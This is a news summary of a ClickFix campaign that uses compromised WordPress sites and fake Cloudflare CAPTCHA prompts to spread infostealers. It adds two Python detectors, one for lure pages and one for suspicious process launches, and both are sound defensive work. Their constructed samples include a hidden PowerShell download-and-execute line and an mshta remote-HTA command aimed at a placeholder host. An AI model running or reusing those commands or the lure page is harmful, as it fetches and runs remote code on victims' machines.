Crooks Compromise WordPress Sites to Push Infostealers via Fake CAPTCHA Prompts

The Register, Mar 10, 2026

Why It Matters

By hosting the lure on trusted, already-indexed WordPress domains, attackers get past both user skepticism and reputation-based URL filtering, which raises infection rates and feeds the credential-theft economy downstream.

Key Takeaways

  • Over 250 WordPress sites compromised across 12 countries
  • Fake Cloudflare CAPTCHA prompts trick users into command execution
  • Attack delivers credential‑stealing infostealer malware
  • Automation suggests organized, long‑term criminal operation
  • Stolen data sold on cyber‑crime marketplaces

Pulse Analysis

WordPress powers roughly 43% of all websites, making it an attractive foothold for threat actors seeking mass distribution. By injecting the lure into existing sites rather than registering new malicious domains, attackers inherit the trust, search ranking and allow-list status of established properties, which sidesteps perimeter defenses that key on unknown or newly registered URLs. Rapid7's finding that more than 250 WordPress installations in twelve countries have been hijacked shows how automation can scale one injection across a global web ecosystem.

The campaign weaponizes a counterfeit Cloudflare CAPTCHA page, a familiar barrier that users routinely click through. Instead of a simple checkbox, the page instructs visitors to copy a command and run it locally, dressed up as a verification step. This is the ClickFix social-engineering playbook, in which the page's JavaScript typically places the command on the clipboard and walks the user through pasting it into the Run dialog and pressing Enter while claiming to fix a security check. No browser exploit is involved: the victim launches the command under their own account, so the infostealer runs with whatever access that user already has. Because the prompt is served from a legitimate domain, browsers and security tools often treat it as benign, which dramatically raises the success rate of the trick.
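The following is an added example illustrating the lure mechanism described above; it is not code from The Register, Rapid7 or the WordPress project. It scores fetched page HTML (or a theme or plugin file pulled during integrity review) on indicators generic to the ClickFix playbook: verification wording, a spoofed Cloudflare brand, JavaScript that writes to the clipboard, and step-by-step Run-dialog instructions. Both sample pages are constructed for the demo, and the `example.invalid` host in the lure is a reserved, unroutable name rather than anything observed in the campaign.

```python
"""Detect ClickFix-style fake-CAPTCHA lures in page content.

Added example for this summary; not code from The Register, Rapid7 or the
WordPress project. Scores HTML on indicators generic to the ClickFix
playbook. Both sample pages below are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# (name, pattern). Case-insensitive so trivial case changes do not evade it.
INDICATORS = [
    ("human_check_text", re.compile(
        r"verify (?:that )?you are (?:a )?human|i(?:'| a)m not a robot", re.I)),
    ("brand_spoof", re.compile(r"cloudflare|ray id", re.I)),
    ("clipboard_write", re.compile(
        r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)),
    ("run_dialog_steps", re.compile(
        r"win(?:dows)?(?:\s*key)?\s*\+\s*r\b|ctrl\s*\+\s*v\b|press\s+enter", re.I)),
    ("script_host_cmd", re.compile(
        r"\b(?:powershell|pwsh|mshta|cmd\.exe|curl|certutil)\b", re.I)),
]

# Best-effort capture of a string literal handed to writeText(). Real lures
# often assemble the string at runtime, so None here is not a clean bill.
CLIPBOARD_LITERAL = re.compile(r"writeText\(\s*(['\"`])(.*?)\1\s*\)", re.S)


@dataclass
class Finding:
    indicators: List[str] = field(default_factory=list)
    verdict: str = "clean"
    payload: Optional[str] = None


def extract_clipboard_payload(html: str) -> Optional[str]:
    m = CLIPBOARD_LITERAL.search(html)
    return m.group(2) if m else None


def scan_html(html: str) -> Finding:
    """A genuine Cloudflare challenge never copies text to the clipboard or
    tells the visitor to open Run, so the clipboard write is the pivot: with
    verification wording alone it is suspicious; combined with Run-dialog
    steps or a script host name it is the lure."""
    f = Finding()
    f.indicators = [name for name, rx in INDICATORS if rx.search(html)]
    hits = set(f.indicators)
    if "clipboard_write" in hits and hits & {"run_dialog_steps", "script_host_cmd"}:
        f.verdict = "clickfix_lure"
    elif "clipboard_write" in hits and "human_check_text" in hits:
        f.verdict = "suspicious"
    f.payload = extract_clipboard_payload(html)
    return f


# Constructed sample 1: the lure. example.invalid is reserved and unroutable.
LURE_PAGE = """
<html><head><title>Just a moment...</title></head><body>
<h1>Verify you are human</h1>
<p>Cloudflare needs to review the security of your connection. Ray ID: 0000</p>
<button id="cb">I'm not a robot</button>
<p>1. Press Windows Key + R  2. Press Ctrl + V  3. Press Enter</p>
<script>
document.getElementById('cb').onclick = function () {
  navigator.clipboard.writeText('powershell -w hidden -c "iwr http://example.invalid/x | iex"');
};
</script></body></html>
"""

# Constructed sample 2: a benign challenge with the same wording and brand but
# no clipboard access and no instruction to run anything.
LEGIT_PAGE = """
<html><head><title>Just a moment...</title></head><body>
<h1>Verify you are human</h1>
<p>Cloudflare needs to review the security of your connection. Ray ID: 0000</p>
<form method="POST"><input type="checkbox" name="challenge"> I'm not a robot</form>
</body></html>
"""

if __name__ == "__main__":
    for label, page in (("lure", LURE_PAGE), ("legit", LEGIT_PAGE)):
        r = scan_html(page)
        print(f"{label}: {r.verdict} indicators={r.indicators} payload={r.payload!r}")
```

Run it against the HTML a crawler actually receives for your own sites, not just the files on disk: injected lures are sometimes stored in the database or served only to certain user agents, so a disk-only integrity check can miss them.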

Beyond the immediate infection, the harvested credentials feed an underground market where other criminals buy ready-made access to email, corporate networks and cryptocurrency wallets. This commoditization shortens breach cycles and means a compromised third-party site has to be treated as a supply-chain risk to everyone who visits it. On the hosting side, defenders should harden WordPress installations (prompt patching of core, themes and plugins; least-privilege accounts and plugins; file and database integrity monitoring that flags injected scripts) to deny the initial foothold. On the endpoint side, the decisive signal is a script interpreter such as PowerShell or mshta launched from the user's own desktop shell with a hidden window, an encoded command or a download cradle on its command line; alerting on or blocking that pattern, together with network filtering for anomalous outbound connections, can stop the infostealer before it exfiltrates.
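As an added example of the endpoint-side detection just described (not a product rule and not a published Rapid7 detection), the following works over process-creation events in JSON with Sysmon Event ID 1 field names (ParentImage, Image, CommandLine). The sample events are constructed. It assumes that a command pasted into the Windows Run dialog or Start search box is spawned by explorer.exe, so a script host whose parent is explorer.exe and whose command line carries a hidden-window flag, an encoded command or a download cradle is scored as the ClickFix signature; the same markers under any other parent are still surfaced at lower severity.

```python
"""Flag ClickFix-style process launches in endpoint telemetry.

Added example for this summary, not a product rule or a published Rapid7
detection. Input: process-creation events as JSON lines with Sysmon Event
ID 1 field names. Assumption: a command pasted into the Run dialog or the
Start search box is spawned by explorer.exe. Sample events are constructed.
"""
import json
import ntpath
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}
USER_SHELL_PARENTS = {"explorer.exe"}  # assumption: Win+R / Start search parent

# (name, pattern) over the command line; all case-insensitive.
MARKERS = [
    ("hidden_window", re.compile(r"(?:^|\s)-(?:w|windowstyle)\s+hidden\b", re.I)),
    ("encoded_command", re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I)),
    ("download_cradle", re.compile(
        r"\biex\b|invoke-expression|invoke-webrequest|\biwr\b|downloadstring|downloadfile", re.I)),
    ("remote_url", re.compile(r"https?://", re.I)),
]


def parse_events(text: str) -> list:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_clickfix(events: list) -> list:
    """One alert per script-host launch whose command line carries a marker.
    Parent explorer.exe means an interactive user ran it: high. Any other
    parent is medium, since -enc or a download cradle deserves triage
    however it was started. A bare interactive shell produces nothing."""
    alerts = []
    for ev in events:
        image = ntpath.basename(ev.get("Image", "")).lower()
        if image not in SCRIPT_HOSTS:
            continue
        cmd = ev.get("CommandLine", "")
        markers = [name for name, rx in MARKERS if rx.search(cmd)]
        if not markers:
            continue
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        alerts.append({
            "time": ev.get("UtcTime"),
            "user": ev.get("User"),
            "image": image,
            "parent": parent,
            "markers": markers,
            "severity": "high" if parent in USER_SHELL_PARENTS else "medium",
        })
    return alerts


# Constructed events (backslashes JSON-escaped). 1 and 2 are the ClickFix
# pattern, 3 is a user opening PowerShell normally, 4 is an encoded command
# under a service (not ClickFix, still worth a look), 5 is noise.
SAMPLE_EVENTS = r"""
{"UtcTime":"2026-03-10 10:01:02","User":"CORP\\alice","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -w hidden -c \"iwr http://example.invalid/x | iex\""}
{"UtcTime":"2026-03-10 10:03:44","User":"CORP\\bob","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\mshta.exe","CommandLine":"mshta http://example.invalid/verify.hta"}
{"UtcTime":"2026-03-10 10:05:10","User":"CORP\\carol","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell"}
{"UtcTime":"2026-03-10 10:06:00","User":"NT AUTHORITY\\SYSTEM","ParentImage":"C:\\Windows\\System32\\svchost.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -enc SQBFAFgA"}
{"UtcTime":"2026-03-10 10:07:15","User":"CORP\\alice","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe notes.txt"}
"""

if __name__ == "__main__":
    for a in detect_clickfix(parse_events(SAMPLE_EVENTS)):
        print(f"{a['severity']:6} {a['time']} {a['user']} {a['parent']} -> {a['image']} {a['markers']}")
```

In a real deployment the explorer.exe parent check is what keeps this from paging on every admin script; pair it with a block rule in your EDR for the high-severity shape, and keep the medium tier as a hunting query rather than an alert.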
